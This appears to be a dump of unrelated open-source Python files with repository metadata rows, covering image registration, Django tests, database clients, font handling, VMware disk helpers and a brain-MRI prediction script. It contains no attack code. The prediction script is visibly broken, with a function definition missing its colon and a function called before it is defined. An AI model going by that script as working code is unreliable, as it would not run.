resampler.SetDefaultPixelValue( 100 )
#
# Cast for output
#
outputCast = itkRescaleIntensityImageFilterF2US2_New()
outputCast.SetInput( resampler.GetOutput() )
outputCast.SetOutputMinimum( 0 )
outputCast.SetOutputMaximum( 65535 )
writer = itkImageFileWriterUS2_New()
writer.SetFileName( argv[3] )
writer.SetInput( outputCast.GetOutput() )
writer.Update()
| cpatrick/ITK-RemoteIO | Examples/Registration/ImageRegistration5.py | Python | apache-2.0 | 6,093 |
import os
import unittest
from vsg.rules import iteration_scheme
from vsg import vhdlFile
from vsg.tests import utils
sTestDir = os.path.dirname(__file__)
lFile, eError =vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir,'rule_101_test_input.vhd'))
dIndentMap = utils.read_indent_file()
lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_101_test_input.fixed.vhd'), lExpected)
class test_iteration_scheme_rule(unittest.TestCase):
def setUp(self):
self.oFile = vhdlFile.vhdlFile(lFile)
self.assertIsNone(eError)
self.oFile.set_indent_map(dIndentMap)
def test_rule_101(self):
oRule = iteration_scheme.rule_101()
self.assertTrue(oRule)
self.assertEqual(oRule.name, 'iteration_scheme')
self.assertEqual(oRule.identifier, '101')
lExpected = [10]
oRule.analyze(self.oFile)
self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))
def test_fix_rule_101(self):
oRule = iteration_scheme.rule_101()
oRule.fix(self.oFile)
lActual = self.oFile.get_lines()
self.assertEqual(lExpected, lActual)
oRule.analyze(self.oFile)
self.assertEqual(oRule.violations, [])
| jeremiah-c-leary/vhdl-style-guide | vsg/tests/iteration_scheme/test_rule_101.py | Python | gpl-3.0 | 1,275 |
from django import forms
from nose.tools import eq_
import test_utils
from . import user, profile
from ..adapters import (KumaAccountAdapter, USERNAME_CHARACTERS,
USERNAME_EMAIL)
from ..forms import UserProfileEditForm
class TestUserProfileEditForm(test_utils.TestCase):
def test_username(self):
"""bug 753563: Support username changes"""
test_user = user(save=True)
data = {
'username': test_user.username,
}
form = UserProfileEditForm(data, instance=profile(test_user))
eq_(True, form.is_valid())
# let's try this with the username above
test_user2 = user(save=True)
form = UserProfileEditForm(data, instance=profile(test_user2))
eq_(False, form.is_valid())
def test_https_profile_urls(self):
"""bug 733610: Profile URLs should allow https"""
protos = (
('http://', True),
('ftp://', False),
('gopher://', False),
('https://', True),
)
sites = (
('website', 'mozilla.org'),
('twitter', 'twitter.com/lmorchard'),
('github', 'github.com/lmorchard'),
('stackoverflow', 'stackoverflow.com/users/testuser'),
('linkedin', 'www.linkedin.com/in/testuser'),
)
self._assert_protos_and_sites(protos, sites)
def test_linkedin_public_profile_urls(self):
"""
Bug 719651 - Profile field validation for LinkedIn is not
valid for international profiles
https://bugzil.la/719651
"""
protos = (
('http://', True),
('https://', True),
)
sites = (
('linkedin', 'www.linkedin.com/in/testuser'),
('linkedin', 'www.linkedin.com/pub/testuser/0/1/826')
)
self._assert_protos_and_sites(protos, sites)
def _assert_protos_and_sites(self, protos, sites):
profile_edit_user = user(save=True)
profile_edit_profile = profile(profile_edit_user)
for proto, expected_valid in protos:
for name, site in sites:
url = '%s%s' % (proto, site)
data = {
"email": "lorchard@mozilla.com",
"websites_%s" % name: url
}
form = UserProfileEditForm(data, instance=profile_edit_profile)
result_valid = form.is_valid()
eq_(expected_valid, result_valid)
class AllauthUsernameTests(test_utils.TestCase):
def test_email_username(self):
"""
Trying to use an email address as a username fails, with a
message saying an email address can't be used as a username.
"""
bad_usernames = (
'testuser@example.com',
'@testuser',
)
adapter = KumaAccountAdapter()
for username in bad_usernames:
self.assertRaisesMessage(forms.ValidationError,
USERNAME_EMAIL,
adapter.clean_username,
username)
def test_bad_username(self):
"""
Illegal usernames fail with our custom error message rather
than the misleading allauth one which suggests '@' is a legal
character.
"""
adapter = KumaAccountAdapter()
self.assertRaisesMessage(forms.ValidationError,
USERNAME_CHARACTERS,
adapter.clean_username,
'dolla$dolla$bill')
| mastizada/kuma | kuma/users/tests/test_forms.py | Python | mpl-2.0 | 3,616 |
# Copyright (C) 2013 Project Hatohol
#
# This file is part of Hatohol.
#
# Hatohol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Hatohol is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Hatohol. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db import transaction
import smartfield
class UserConfig(models.Model):
item_name = models.CharField(max_length=255, db_index=True)
user_id = models.IntegerField(db_index=True)
value = smartfield.SmartField()
def __init__(self, *args, **kwargs):
if 'value' in kwargs:
value = kwargs['value'];
kwargs['value'] = smartfield.SmartField.UserConfigValue(value)
models.Model.__init__(self, *args, **kwargs)
def __unicode__(self):
return '%s (%d)' % (self.item_name, self.user_id)
@classmethod
def get_object(cls, item_name, user_id):
"""Get an object of UserConfig
Args:
item_name: A configuration item
user_id: A user ID for the configuration
Returns:
If the matched item exists, it is returned. Otherwise, None is
returned.
"""
objs = UserConfig.objects.filter(item_name=item_name).filter(user_id=user_id)
if not objs:
return None
assert len(objs) == 1
return objs[0]
@classmethod
def get(cls, item_name, user_id):
"""Get a user configuration
Args:
item_name: A configuration item
user_id: A user ID for the configuration
Returns:
If the matched item exists, it is returned. Otherwise, None is
returned.
"""
obj = cls.get_object(item_name, user_id)
if obj is None:
return None
return obj.value
@classmethod
@transaction.commit_on_success
def get_items(cls, item_name_list, user_id):
items = {}
for item_name in item_name_list:
value = cls.get(item_name, user_id)
items[item_name] = value
return items
def _store_without_transaction(self):
obj = self.get_object(self.item_name, self.user_id)
if obj is not None:
self.id = obj.id # to update on save()
self.save()
@transaction.commit_on_success
def store(self):
"""Insert if the record with item_name and user_id doesn't exist.
Otherwise update with value of the this object.
"""
self._store_without_transaction()
@classmethod
@transaction.commit_on_success
def store_items(cls, items, user_id):
for name in items:
value = items[name]
user_conf = UserConfig(item_name=name, user_id=user_id, value=value)
user_conf._store_without_transaction()
class LogSearchSystem(models.Model):
type = models.CharField(max_length=128)
base_url = models.CharField(max_length=512)
| project-hatohol/hatohol-14.12 | client/hatohol/models.py | Python | gpl-2.0 | 3,386 |
""":mod:`wand.font` --- Fonts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. versionadded:: 0.3.0
:class:`Font` is an object which takes the :attr:`~Font.path` of font file,
:attr:`~Font.size`, :attr:`~Font.color`, and whether to use
:attr:`~Font.antialias`\\ ing. If you want to use font by its name rather
than the file path, use TTFQuery_ package. The font path resolution by its
name is a very complicated problem to achieve.
.. seealso::
TTFQuery_ --- Find and Extract Information from TTF Files
TTFQuery builds on the `FontTools-TTX`_ package to allow the Python
programmer to accomplish a number of tasks:
- query the system to find installed fonts
- retrieve metadata about any TTF font file
- this includes the glyph outlines (shape) of individual code-points,
which allows for rendering the glyphs in 3D (such as is done in
OpenGLContext)
- lookup/find fonts by:
- abstract family type
- proper font name
- build simple metadata registries for run-time font matching
.. _TTFQuery: http://ttfquery.sourceforge.net/
.. _FontTools-TTX: http://sourceforge.net/projects/fonttools/
"""
from . import assertions
from .color import Color
from .compat import string_type, text
__all__ = ('Font',)
class Font(tuple):
"""Font struct which is a subtype of :class:`tuple`.
:param path: the path of the font file
:type path: :class:`str`, :class:`basestring`
:param size: the size of typeface. 0 by default which means *autosized*
:type size: :class:`numbers.Real`
:param color: the color of typeface. black by default
:type color: :class:`~wand.color.Color`
:param antialias: whether to use antialiasing. :const:`True` by default
:type antialias: :class:`bool`
:param stroke_color: optional color to outline typeface.
:type stroke_color: :class:`~wand.color.Color`
:param stroke_width: optional thickness of typeface outline.
:type stroke_width: :class:`numbers.Real`
.. versionchanged:: 0.3.9
The ``size`` parameter becomes optional. Its default value is
0, which means *autosized*.
.. versionchanged:: 0.5.0
Added ``stroke_color`` & ``stoke_width`` paramaters.
"""
def __new__(cls, path, size=0, color=None, antialias=True,
stroke_color=None, stroke_width=None):
assertions.assert_string(path=path)
assertions.assert_real(size=size)
if color is None:
color = Color('black')
elif isinstance(color, string_type):
color = Color(color)
assertions.assert_color(color=color)
if stroke_color:
if isinstance(stroke_color, string_type):
stroke_color = Color(stroke_color)
assertions.assert_color(stroke_color=stroke_color)
if stroke_width is not None:
assertions.assert_real(stroke_width=stroke_width)
path = text(path)
return tuple.__new__(cls, (path, size, color, bool(antialias),
stroke_color, stroke_width))
@property
def path(self):
"""(:class:`basestring`) The path of font file."""
return self[0]
@property
def size(self):
"""(:class:`numbers.Real`) The font size in pixels."""
return self[1]
@property
def color(self):
"""(:class:`wand.color.Color`) The font color."""
return self[2]
@property
def antialias(self):
"""(:class:`bool`) Whether to apply antialiasing (``True``)
or not (``False``).
"""
return self[3]
@property
def stroke_color(self):
"""(:class:`wand.color.Color`) The stroke color."""
return self[4]
@property
def stroke_width(self):
"""(:class:`numbers.Real`) The width of the stroke line."""
return self[5]
def __repr__(self):
return '{0.__module__}.{0.__name__}({1})'.format(
type(self),
tuple.__repr__(self)
)
| dahlia/wand | wand/font.py | Python | mit | 4,021 |
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016-2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
import pyVim.task
from pyVmomi import vim
from samples.vsphere.common.vim.inventory import get_datastore_mo
from samples.vsphere.common.vim import datastore_file
def create_vmdk(service_instance, datacenter_mo, datastore_path):
"""Create vmdk in specific datacenter"""
vdm = service_instance.content.virtualDiskManager
task = vdm.CreateVirtualDisk(
datastore_path, datacenter_mo,
vim.VirtualDiskManager.SeSparseVirtualDiskSpec(
diskType='seSparse', adapterType='lsiLogic',
capacityKb=1024 * 1024 * 4))
pyVim.task.WaitForTask(task)
print("Created VMDK '{}' in Datacenter '{}'".
format(datastore_path, datacenter_mo.name))
return task.info.result
def delete_vmdk(service_instance, datacenter_mo, datastore_path):
"""Delete vmdk from specific datastore"""
vdm = service_instance.content.virtualDiskManager
task = vdm.DeleteVirtualDisk(datastore_path, datacenter_mo)
pyVim.task.WaitForTask(task)
def detect_vmdk(client, soap_stub, datacenter_name, datastore_name,
datastore_path):
"""Find vmdk in specific datastore"""
datastore_mo = get_datastore_mo(client,
soap_stub,
datacenter_name,
datastore_name)
if not datastore_mo:
return False
dsfile = datastore_file.File(datastore_mo)
if dsfile.exists(datastore_path):
return True
else:
return False
| pgbidkar/vsphere-automation-sdk-python | samples/vsphere/common/vim/vmdk.py | Python | mit | 2,080 |
from bokeh.plotting import figure, output_file, show
p = figure(width=400, height=400)
p.circle(2, 3, radius=.5, alpha=0.5)
output_file('out.html')
show(p)
| Serulab/Py4Bio | code/ch14/basiccircle.py | Python | mit | 157 |
from .base import StructuredModel
from .crf import CRF
from .grid_crf import GridCRF, DirectionalGridCRF
from .graph_crf import GraphCRF
from .chain_crf import ChainCRF
from .latent_grid_crf import LatentGridCRF, LatentDirectionalGridCRF
from .latent_graph_crf import LatentGraphCRF
from .latent_node_crf import LatentNodeCRF, EdgeFeatureLatentNodeCRF
from .unstructured_svm import BinaryClf, MultiClassClf
from .multilabel_svm import MultiLabelClf
from .edge_feature_graph_crf import EdgeFeatureGraphCRF
__all__ = ["StructuredModel", "CRF", "GridCRF", "GraphCRF",
"DirectionalGridCRF", "BinaryClf", "LatentGridCRF",
"LatentDirectionalGridCRF", "MultiClassClf", "LatentGraphCRF",
"MultiLabelClf", "ChainCRF", "LatentNodeCRF", "EdgeFeatureGraphCRF",
"EdgeFeatureLatentNodeCRF"]
| d-mittal/pystruct | pystruct/models/__init__.py | Python | bsd-2-clause | 822 |
from osgeo import ogr
def addField(shapefile,field):
source = ogr.Open(shapefile, 1)
layer = source.GetLayer()
layer_defn = layer.GetLayerDefn()
new_field = ogr.FieldDefn(field, ogr.OFTInteger)
layer.CreateField(new_field)
source = None
# addField('A_Roads.shp','example') add the 'example' field to A_Roads shapefile
| zero-point/hackattack | addField.py | Python | mit | 324 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pymongo
class MongoClient:
""" mongodb client """
def __init__(self, host = "localhost", port = 27017, dbName = "test", debug = False):
self.host = host
self.port = port
self.conn = pymongo.MongoClient(host, port)
self.db = self.conn[dbName]
self.debug = debug
if(debug):
print "host: " + host
print "port: " + str(port)
print "dbName: " + dbName
def authenticate(self, username, passwd):
ret = self.db.authenticate(username, passwd)
return ret
def getDBInfo(self):
return
def getCollections(self):
return self.db.collection_names()
def insert(self, collection, doc):
coll = self.db[collection]
ret = coll.insert(doc)
return ret
def get_one(self, collection, condition, fields = None):
coll = self.db[collection]
return coll.find_one(condition, fields)
def get(self, collection, condition, fields = None):
coll = self.db[collection]
cursor = coll.find(condition, fields)
return cursor
def update(self, collection, condition, operation, upsert=False, manipulate=False, safe=False, multi=False, _check_keys=False):
coll = self.db[collection]
ret = coll.update(condition, operation, upsert = upsert, manipulate=manipulate, safe=safe, multi=multi)
return ret
def remove(self, collection, condition):
coll = self.db[collection]
return coll.remove(condition)
def next(self, cursor):
try:
obj = cursor.next()
except StopIteration:
return None
return obj
| huangby/javaweb | pythonfile/util/mongo.py | Python | epl-1.0 | 1,780 |
#!/usr/bin/env python
import os
import numpy as np
import nibabel as nib
import sklearn as skl
import pandas as pd
from sklearn.svm import LinearSVC
from sklearn.decomposition import PCA
import random
from sklearn import datasets, linear_model
from xml.dom import minidom
import lib_IO
training_samples = 278
test_samples = 138
x_shape = 176
y_shape = 208
z_shape = 176
final = x_shape*y_shape*z_shape
sample_size = 1000
samples = np.zeros((sample_size,3))
"""for i in range(0,sample_size):
samples[i,0]=random.randrange(0, 176)
samples[i,1]=random.randrange(0, 208)
samples[i,2]=random.randrange(0, 176)"""
train = np.zeros((training_samples,final))
test = np.zeros((test_samples,final))
train_labels = pd.read_csv('targets.csv', header=None)
counter = 0
cols = []
print("Traversing images and shaping to feature vector")
for file in os.listdir('data/set_train'):
print(counter)
file_path = os.path.join('data/set_train', file)
img = nib.load(file_path)
img_data = img.get_data()
img_data = img_data[:,:,:,0]
train[counter,:] = img_data.reshape(final)
counter += 1
mask = (train < 10)
idx = mask.any(axis=0)
counter = 0
for file in os.listdir('data/set_test'):
print(counter)
file_path = os.path.join('data/set_test', file)
img = nib.load(file_path)
img_data = img.get_data()
img_data = img_data[:,:,:,0]
test[counter,:] = img_data.reshape(final)
counter += 1
train = train[:,~idx]
test = test[:,~idx]
print(train.shape)
print(train)
print(test.shape)
print(test)
#train = train[:,:10]
#test = test[:,:10]
print("Dimensionality Reduction")
"""pca = PCA(150, 'randomized',
whiten=True).fit(train)
train_pca = pca.transform(train)
test_pca = pca.transform(test)
print(train_pca.shape)"""
"""print("Train Linear SVC")
model = LinearSVC()
model.fit(train,train_labels.values.ravel())
print("Begin predictions")
print(model.predict(test))"""
# Create linear regression object
regr = linear_model.LinearRegression()
# Train the model using the training sets
regr.fit(train, train_labels.values.ravel())
print(regr.predict(test))
print("Next")
model = LinearSVC()
model.fit(train,train_labels.values.ravel())
y_predict = model.predict(test)
print("Done")
write_Y("prediction.csv",y_predict,np.arange(start=1,stop=138,dtype=np.uint32))
# returns numpy array of data. Dimensions: samplesCount X 6
# features are [abs CSF volume, abs GM volume, abs WM volume, rel CSF volume, rel GM volume, rel WM volume]
# samples count:
# training: 278
# testing: 138
def parseDataSetXML(samplesCount,filepath)
files = [f for f in os.listdir(filepath)]
features_matrix = np.zeros((samplesCount,6))
for f in files:
# print(f)
if(f==".DS_Store"):
continue
xmldoc = minidom.parse(filepath + '/'+f)
filenmae = xmldoc.getElementsByTagName('file')[0].childNodes[0].data
index = filenmae.split("_")[1]
# print(index)
values = xmldoc.getElementsByTagName('file')[0].childNodes[0].data
if(xmldoc.getElementsByTagName('vol_abs_CGW')):
vol_abs_CGW = xmldoc.getElementsByTagName('vol_abs_CGW')[0].childNodes[0].data
else:
print("Attributes missing at index " + index)
if(xmldoc.getElementsByTagName('vol_rel_CGW')):
vol_rel_CGW = xmldoc.getElementsByTagName('vol_rel_CGW')[0].childNodes[0].data
else:
print("Attributes missing at index " + index)
cAbs = vol_abs_CGW.split("[")[1].split(" ")[0]
gAbs = vol_abs_CGW.split("[")[1].split(" ")[1]
wAbs = vol_abs_CGW.split("[")[1].split(" ")[2]
cRel = vol_rel_CGW.split("[")[1].split(" ")[0]
gRel = vol_rel_CGW.split("[")[1].split(" ")[1]
wRel = vol_rel_CGW.split("[")[1].split(" ")[2]
features_matrix[int(index)-1,:] = np.array([float(cAbs),float(gAbs),float(wAbs),float(cRel),float(gRel),float(wRel)])
return features_matrix
def write_Y(fname, Y_pred, Ids):
if Y_pred.shape[0] != Ids.shape[0]:
print("error Ids- dimension of y matrix does not match number of expected predictions")
print('y: {0} - expected: {1}'.format(Y_pred.shape,Ids.shape))
else:
f = open(fname, 'w+')
np.savetxt(fname=f,X= np.column_stack([Ids,Y_pred]),
fmt=['%d', '%d'],delimiter=',',header='Id,Prediction',comments='')
| tobiagru/ML | src/predict.py | Python | gpl-3.0 | 4,147 |
import shutil
from nose.tools import *
from holland.lib.lvm import LogicalVolume
from holland.lib.lvm.snapshot import *
from tests.constants import *
class TestSnapshot(object):
def setup(self):
self.tmpdir = tempfile.mkdtemp()
def teardown(self):
shutil.rmtree(self.tmpdir)
def test_snapshot_fsm(self):
lv = LogicalVolume.lookup('%s/%s' % (TEST_VG, TEST_LV))
name = lv.lv_name + '_snapshot'
size = 1 # extent
snapshot = Snapshot(name, size, self.tmpdir)
snapshot.start(lv)
def test_snapshot_fsm_with_callbacks(self):
lv = LogicalVolume.lookup('%s/%s' % (TEST_VG, TEST_LV))
name = lv.lv_name + '_snapshot'
size = 1 # extent
snapshot = Snapshot(name, size, self.tmpdir)
def handle_event(event, *args, **kwargs):
pass
snapshot.register('pre-mount', handle_event)
snapshot.register('post-mount', handle_event)
snapshot.start(lv)
def test_snapshot_fsm_with_failures(self):
lv = LogicalVolume.lookup('%s/%s' % (TEST_VG, TEST_LV))
name = lv.lv_name + '_snapshot'
size = 1 # extent
snapshot = Snapshot(name, size, self.tmpdir)
def bad_callback(event, *args, **kwargs):
raise Exception("Oooh nooo!")
for evt in ('initialize', 'pre-snapshot', 'post-snapshot',
'pre-mount', 'post-mount', 'pre-unmount', 'post-unmount',
'pre-remove', 'post-remove', 'finish'):
snapshot.register(evt, bad_callback)
assert_raises(CallbackFailuresError, snapshot.start, lv)
snapshot.unregister(evt, bad_callback)
if snapshot.sigmgr._handlers:
raise Exception("WTF. sigmgr handlers still exist when checking event => %r", evt)
| m00dawg/holland | plugins/holland.lib.lvm/tests/xfs/test_snapshot.py | Python | bsd-3-clause | 1,824 |
import time
class FPS_counter:
def __init__(self, limit=0):
self._time = time.time() # seconds since epoch
self._dt = 0 # seconds
self._min_dt = 1 / limit if limit > 0 else 0
self._limited = False
def _get_dt(self):
return time.time() - self._time
def update(self):
dt = self._get_dt()
if dt < self._min_dt:
time.sleep(self._min_dt - dt)
self._time += self._min_dt
self._dt = self._dt * 0.9 + self._min_dt * 0.1
self._limited = True
else:
self._time += dt
self._dt = self._dt * 0.9 + dt * 0.1
self._limited = False
@property
def dt_remaining(self):
return max(self._min_dt - self._get_dt(), 0)
@property
def last_dt(self):
return self._dt
def __str__(self):
return '{:.2f}fps{}'.format(1 / self._dt, '+' if self._limited else '-')
| ngcm/interactive-fluid-demo | util/FPS_counter.py | Python | mit | 987 |
# This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import time
#-----------------------------------------------------------------------
class Logger:
"provides facility for loggin messages during runtime"
#-----------------------------------------------------------------------
def __init__(self, log_name, debug_level = 1):
"logger init routine"
self.log_name = log_name
self.debug_level = debug_level
#-----------------------------------------------------------------------
def log(self, str):
"writes string to log file"
if self.debug_level:
tstr = ''
# tstr = '(' + time.strftime('%H:%M:%S', time.localtime(time.time())) + ') '
# time.clock()
fptr = open(self.log_name, 'a')
fptr.write(tstr + str)
fptr.close()
| nka11/KaraCos-Desktop | py/utils/ntlmaps/logger.py | Python | gpl-3.0 | 1,681 |
#!/usr/bin/python
import sys
def push(stack_list, input):
stack_list.append(input)
def pop(stack_array):
if len(stack_array) == 0:
return 0
else:
value = stack_array.pop()
return value
def peep(stack_array):
value = len(stack_array)
if value == 0:
return 0
else:
return stack_array[value -1]
def is_empty(stack_array):
if len(stack_array) == 0:
return True
else:
return False
def exit_code():
sys.exit()
if __name__=="__main__":
stack_list = []
while True:
value = 0
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
print ("Enter the operation to be performed on stack: ")
print ("1. Print")
print ("2. Push")
print ("3. Pop")
print ("4. Is Empty")
print ("5. Peep")
print ("0. Exit")
try:
value = int(raw_input("Enter the option: "))
except (TypeError, NameError, RuntimeError, ValueError):
value = 6
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
if value == 1:
print stack_list
elif value == 2:
input_value = input("Enter the value to be pushed: ")
push(stack_list, input_value)
print ("Now the stack looks like: ")
print stack_list
del input_value
elif value == 3:
pop_value = pop(stack_list)
print ("Poped value is : " +str(pop_value))
print ("Now the stack looks like")
print stack_list
elif value == 4:
print "Stack is empty: " +str(is_empty(stack_list))
elif value == 5:
print "Peep value for stack: " +str(peep(stack_list))
elif value == 0:
print "Good Byee... :)"
exit_code()
else:
print "Please enter a valid input"
del value
| RGU5Android/PythonLectureNotes | HomeWork/10-06-14/stack.py | Python | gpl-2.0 | 1,993 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.